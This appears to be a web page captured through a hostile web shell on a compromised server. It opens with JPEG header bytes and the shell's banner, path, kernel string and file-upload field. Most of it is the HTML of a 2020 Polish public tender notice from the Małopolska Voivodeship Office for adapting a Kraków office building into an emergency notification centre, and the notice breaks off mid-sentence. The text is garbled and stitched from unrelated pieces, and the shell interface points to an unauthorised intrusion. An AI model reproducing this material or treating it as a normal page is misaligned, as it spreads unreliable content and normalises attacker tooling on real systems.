JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200406/527944-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 527944-N-2020 z dnia 2020-04-06 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Małopolski Urząd Wojewódzki w Krakowie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Zaprojektowanie i wykonanie adaptacji budynku biurowego przy ul. Szlak 73A w Krakowie dla potrzeb Centrum Powiadamiania Ratunkowego</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Małopolski Urząd Wojewódzki w Krakowie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00051417600000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Basztowa</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">22</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">31-156</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Kraków</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">12 3921 338</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia.publiczne@malopolska.uw.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">12 3921956</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.malopolska.uw.gov.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja rządowa terenowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">https://muw.ezamawiajacy.pl/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://muw.ezamawiajacy.pl/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Tak</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne">https://muw.ezamawiajacy.pl/</span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Zaprojektowanie i wykonanie adaptacji budynku biurowego przy ul. Szlak 73A w Krakowie dla potrzeb Centrum Powiadamiania Ratunkowego</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">WL-IV.272.11.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest zaprojektowanie i wykonanie adaptacji budynku biurowego przy ul. Szlak 73A w Krakowie na dz. 47/24 obr. 118 dla potrzeb Centrum Powiadamiania Ratunkowego. Zakres zamówienia obejmuje również roboty budowlane na terenie działki nr 47/18 obr. 118.Zakres zamówienia obejmuje:I. w zakresie prac projektowych:1) wykonanie dokumentacji projektowej, w zakresie wszelkich projektów budowlanych niezbędnych do uzyskania decyzji o pozwoleniu na budowę, a także projektów wykonawczych i warsztatowych we wszystkich branżach wraz z wszystkimi niezbędnymi opiniami, uzgodnieniami, pozwoleniami i innymi dokumentami wymaganymi przepisami szczegółowymi, zgodnie z przepisami:a) ustawą Prawo budowlane,b) rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. 2018.1935),c) rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. 2019.1065),d) rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej (Dz.U.2013.1129),e) rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U.2004.130.1389),f) rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U.2003.120. 1126).2) wykonanie STWiORB, zgodnie z przepisami rozporządzenia, o którym mowa w pkt. 1) lit. d),3) sporządzenie kompletnego wniosku o wydanie decyzji o pozwoleniu na budowę i uzyskanie, w imieniu Zamawiającego, pozwolenia na budowę oraz dokonanie skutecznych zgłoszeń robót nie wymagających pozwolenia na budowę, w szczególności w zakresie robót rozbiórkowych możliwych do realizacji równolegle z wykonywaniem dokumentacji projektowej,4) przed wykonaniem dokumentacji projektowej Wykonawca zobowiązuje się do pisemnego uzgodnienia z przedstawicielami Zamawiającego i Nadzorem Inwestorskim wszelkich szczegółów technicznych i użytkowych mających wpływ na wykonanie przedmiotu umowy,5) Generalny Wykonawca ma obowiązek zapewnić sprawdzenie dokumentacji pod względem zgodności z przepisami w tym techniczno – budowlanymi i Polskimi Normami przez osobę posiadającą uprawnienia do projektowania bez ograniczeń w odpowiedniej specjalności lub rzeczoznawcę budowlanego,6) Przyjęte rozwiązania Generalny Wykonawca zobowiązuje się uprzednio uzgodnić z Zamawiającym i Nadzorem Inwestorskim i potwierdzić to uzgodnienie w formie pisemnej na jednym egzemplarzu projektu. Osoby upoważnione lub wskazane przez Zamawiającego będą miały możliwość zapoznania się z rozwiązaniami projektowymi, a wniesione uwagi będą uwzględnione przez Projektantów,7) Generalny Wykonawca zobowiązuje się aby przekazywana dokumentacja była wzajemnie skoordynowana technicznie i kompletna z punktu widzenia celu, któremu ma służyć oraz, że zawierać będzie wymagane potwierdzenia sprawdzeń rozwiązań projektowych w zakresie wynikającym z przepisów, wymagane opinie, uzgodnienia, zgody i pozwolenia w zakresie wynikającym z przepisów, a także spis opracowań i dokumentacji składających się na komplet przedmiotu umowy. Dokumentacja posiadać będzie również oświadczenie Wykonawcy o spełnieniu powyższych wymagań. Wykonawca dołączy oświadczenie o zgodności wersji papierowej z elektroniczną.8) Generalny Wykonawca zobowiązuje się przed sporządzeniem protokołu zdawczo-odbiorczego zwrócić wszelkie udostępnione przez Zamawiającego dokumenty i materiały.9) Generalny Wykonawca zobowiązuje się za pośrednictwem Projektanta do sprawowania nadzoru autorskiego we wszystkich branżach podczas realizacji Inwestycji. W ramach nadzoru autorskiego Projektant jest zobowiązany do przedstawiania Zamawiającemu i Nadzorowi Inwestorskiemu ewentualnych zmian projektowych postulowanych przez Generalnego Wykonawcę robót w trakcie realizacji zadania, w każdym przypadku gdy mogą one wpłynąć na polepszenie eksploatacji projektowanej Inwestycji,10) Generalny Wykonawca zobowiązuje się do terminowego dokonywania poprawek, zmian i uzupełnień w przypadku ich wskazania przez właściwy organ w procesie uzgadniania i uzyskiwania pozwolenia na budowę,11) Generalny Wykonawca zobowiązuje się do wykonania i opracowania wszelkich niezbędnych projektów wykonawczych i warsztatowych dotyczących uszczegółowienia rozwiązań zawartych w dokumentacji projektowej we wszystkich branżach tj. architekturze, konstrukcji oraz wszystkich robotach instalacyjnych w ramach wynagrodzenia umownego.12) Generalny Wykonawca zobowiązuje się do wykonania i opracowania wszelkich niezbędnych projektów we wszystkich branżach w przypadku braku rozwiązań w przekazanej dokumentacji, w szczególności PFU, w ramach wynagrodzenia umownego.II. w zakresie robót budowlanych:1) wykonania i oddania Zamawiającemu Obiektu (budynku biurowego przy ul. Szlak 73A w Krakowie na dz. 47/24 obr. 118 wraz z otoczeniem, w tym na dz. 47/18) w ramach Inwestycji zgodnie z dokumentacją przetargową, w tym PFU a także opracowaną i zatwierdzoną przez Zamawiającego i Nadzór Inwestorski Dokumentacją techniczną oraz wydanymi pozwoleniami i zezwoleniami w terminie określonym w § 3 niniejszej umowy,2) dostarczenia materiałów i urządzeń, konstrukcji i maszyn, niezbędnych do wykonania przedmiotu umowy, dostarczenie mediów na plac budowy ze źródeł wskazanych przez Zamawiającego,3) na każde żądanie Nadzoru Inwestorskiego, w trakcie realizacji Inwestycji, do okazania w stosunku do wskazanych materiałów certyfikatu na znak CE, deklaracji zgodności, aprobaty technicznej lub atestu higienicznego,4) w przypadku zniszczenia lub uszkodzenia Obiektu z winy Generalnego Wykonawcy w trakcie realizacji zobowiązany jest on do jego naprawienia i doprowadzenia do stanu poprzedniego na własny koszt, 5) ochrony mienia, zabezpieczenia p.poż. i utrzymania ogólnego porządku na terenie budowy,6) opracowanie i przedstawienie do akceptacji Nadzoru Inwestorskiego Planu Bezpieczeństwa i Ochrony Zdrowia (BiOZ) – w terminie do 14 dni od dnia zawarcia Umowy;7) opracowanie i przedstawienie do akceptacji Nadzoru Inwestorskiego projektów zagospodarowania terenu budowy i projektów organizacji robót, w tym ruchu – w terminie do 14 dni od dnia zawarcia Umowy - zorganizowanie terenu budowy zgodnie z powyższymi zaakceptowanymi projektami, w tym wykonania dróg komunikacji, obejść, kładek, zastaw, zadaszeń, ogrodzeń, instalacji itp. a także zapewnienia warunków bezpieczeństwa. Generalny Wykonawca jest zobowiązany oznakować i zabezpieczyć prowadzone roboty przed ewentualnymi wypadkami podczas prowadzenia robót oraz dbać o stan techniczny oraz prawidłowość oznakowania przez cały czas trwania realizacji Inwestycji. Generalny Wykonawca ponosi pełną odpowiedzialność za teren budowy od chwili przejęcia terenu budowy. W ramach obowiązku organizacji zaplecza budowy Generalny Wykonawca zapewni jedno pomieszczenie dla organizacji biura Nadzoru Inwestorskiego i wyposaży co najmniej w krzesła, biurka, stół, dostęp do prądu i Internetu . Koszty związane z użytkowaniem pomieszczenia, w tym koszty mediów, ponosi Generalny Wykonawca w ramach wynagrodzenia umownego, określonego w § 13.8) uzgadnianie z Projektantem, sporządzenie i przedstawienie do weryfikacji Zamawiającemu i Nadzorowi Inwestorskiemu rysunków warsztatowych niezbędnych do wykonania robót – zgodnie z bieżącym zapotrzebowaniem;9) sporządzenie i przedstawienie do weryfikacji kompletu materiałów potrzebnych do uzyskania pozwolenia na użytkowanie Obiektu oraz uzyskanie w imieniu Zamawiającego ostatecznego pozwolenia na użytkowanie Inwestycji; 10) obsługa geodezyjna Inwestycji wraz z wytyczeniem Obiektu oraz wykonywanie na każde żądanie Zamawiającego inwentaryzacji geodezyjnej na każdym etapie wykonywania Przedmiotu Umowy. Jeżeli w przypadku żądanego przez Zamawiającego dodatkowego pomiaru geodezyjnego okaże się, że wynik pomiaru elementów konstrukcji jest zgodny z Dokumentacją projektową koszt wykonania dodatkowych pomiarów poniesie Zamawiający. W przeciwnym przypadku koszt pomiarów obciąża Generalnego Wykonawcę;11) wykonanie niezbędnych badań geotechnicznych towarzyszących wykonywaniu robót;12) wykonanie niezbędnych badań betonów poprzez specjalistyczne laboratorium budowlane oraz pobieranie próbek w trakcie betonowania, a także dostarczenie Nadzorowi Inwestorskiemu stosownych atestów z całego okresu wykonywania robót żelbetowych;13) uzyskanie we własnym zakresie wszelkich wymaganych zezwoleń związanych z wykonywanymi robotami, w tym wynikających z pozwolenia na budowę;14) wykonanie niezbędnych ekspertyz i opracowań inżynierskich, których konieczność przygotowania może wystąpić w trakcie budowy, w tym świadectwa charakterystyki energetycznej budynku;15)	przygotowanie dokumentów niezbędnych do kontroli budowy przed wydaniem opinii w sprawie zgodności wykonania Przedmiotu Umowy z projektem budowlanym przez organy określone w art. 56 Prawa budowlanego tj. Państwowej Straży Pożarnej, Państwowej Inspekcji Sanitarnej oraz obowiązkowej kontroli Inspektora Nadzoru Budowlanego;16) sporządzenie i przedstawienie do weryfikacji Zamawiającemu i Nadzorowi Inwestorskiemu instrukcji, oznakowania i procedur przeciwpożarowych (ppoż.) oraz bezpieczeństwa i higieny pracy (bhp) i innych materiałów niezbędnych do prawidłowego funkcjonowania Obiektu, w tym instrukcji bezpieczeństwa pożarowego Obiektu oraz instrukcji i procedur dotyczących obsługi zamontowanego w Obiekcie wyposażenia, sprzętu i urządzeń, jako elementu dokumentacji powykonawczej;17) sporządzenie i przedstawienie świadectwa charakterystyki energetycznej Obiektu, jako elementu dokumentacji powykonawczej;18) wykonanie operatów geodezyjnych powykonawczych dla Inwestycji i uzbrojenia zewnętrznego wraz z naniesieniem na mapę zasadniczą miasta Krakowa;19) wykonanie operatów geodezyjnych powykonawczych konstrukcji Obiektu, osiowości i pionowości konstrukcji słupowej, poziomów stropów i innych pomiarów wskazanych przez Zamawiającego lub Nadzór Inwestorski;20) przygotowanie i zgłoszenie do odbioru urządzeń, dla których wymagane są odbiory jednostek zewnętrznych, w tym Urzędu Dozoru Technicznego;21) wykonanie innych czynności lub prac, których konieczność ujawni się w trakcie wykonywania Przedmiotu Umowy, a które Generalny Wykonawca powinien był przewidzieć na podstawie obowiązujących przepisów techniczno-budowlanych i administracyjnych, jak również te, które można było przewidzieć na podstawie postanowień niniejszej Umowy, wiedzy technicznej, sztuki budowlanej i ustalonymi zwyczajami;22) opracowanie schematu rozwoju zdarzeń w trakcie pożaru oraz matrycy sterowań instalacji ppoż;23) opracowanie instrukcji użytkowania Obiektu;24) opracowanie planu ewakuacji budynku;25) zapewnienie nadzoru archeologicznego;26) przeprowadzenie szkoleń dla personelu Zamawiającego w zakresie obsługi obiektu, w tym w szczególności szkoleń w zakresie obsługi zainstalowanych urządzeń;27) zapewnienie ochrony mienia znajdującego się na terenie budowy,28) zabezpieczenie terenu budowy, w tym w sposób uniemożliwiający osobom postronnym dostęp do terenu budowy;29) przygotowanie i przedstawianie Zamawiającemu Programu zapewnienia jakości, o którym mowa w § 12 oraz jego aktualizowanie podczas realizacji Umowy;30) przygotowanie i przedstawianie Zamawiającemu Programu naprawczego, w przypadku wystąpienia okoliczności, o których mowa w § 3 ust. 6.Szczegółowy opis przedmiotu zamówienia, jak również wymagania, założenia i wytyczne odnoszące się do zamówienia, zostały zawarte w programie funkcjonalno – użytkowym, stanowiącym zał. nr 5 do siwz, oraz zał. nr 6 do siwz.2. Wartość zamówienia nie przekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy.3. Miejsce realizacji zamówienia: Kraków.4. Uwagi dla wykonawców:a) W celu przygotowania właściwej i kompleksowej kalkulacji cenowej (oferty), Wykonawca może uczestniczyć w wizji lokalnej. Termin indywidualnej wizji lokalnej można 